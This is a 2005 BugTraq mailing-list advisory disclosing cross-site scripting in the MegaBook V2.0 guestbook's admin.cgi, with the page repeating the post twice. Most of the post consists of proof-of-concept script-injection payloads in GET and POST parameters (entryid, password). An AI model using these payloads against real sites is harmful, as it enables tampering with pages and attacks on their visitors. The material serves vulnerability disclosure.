BugTraq
Back to list
|
Post reply
MegaBook V2.0 - Cross Site Scripting Exploit
May 05 2005 10:45AM
Spy Hat (spyhat spyhat com)
The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi
URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)
I have tested the script with the following query:
?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-7
03410097');</script>
I have also tested the script with theses POST variables:
action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic
-string-188784308');</script>
action=modifypost&entryid=66&password='><script>alert('wvs-xss-mag
ic-string-486624156');</script>
action=modifypost&entryid=66&password="><script>alert('wvs-xss-mag
ic-string-1852691616');</script>
action=modifypost&entryid=66&password=><script>alert('wvs-xss-magi
c-string-429380114');</script>
action=modifypost&entryid=66&password=</textarea><script>alert('wv
s-xss-magic-string-723975367');</script>
Yours,
SpyHat
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi
URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)
I have tested the script with the following query:
?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-7
03410097');</script>
I have also tested the script with theses POST variables:
action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic
-string-188784308');</script>
action=modifypost&entryid=66&password='><script>alert('wvs-xss-mag
ic-string-486624156');</script>
action=modifypost&entryid=66&password="><script>alert('wvs-xss-mag
ic-string-1852691616');</script>
action=modifypost&entryid=66&password=><script>alert('wvs-xss-magi
c-string-429380114');</script>
action=modifypost&entryid=66&password=</textarea><script>alert('wv
s-xss-magic-string-723975367');</script>
Yours,
SpyHat
[ reply ]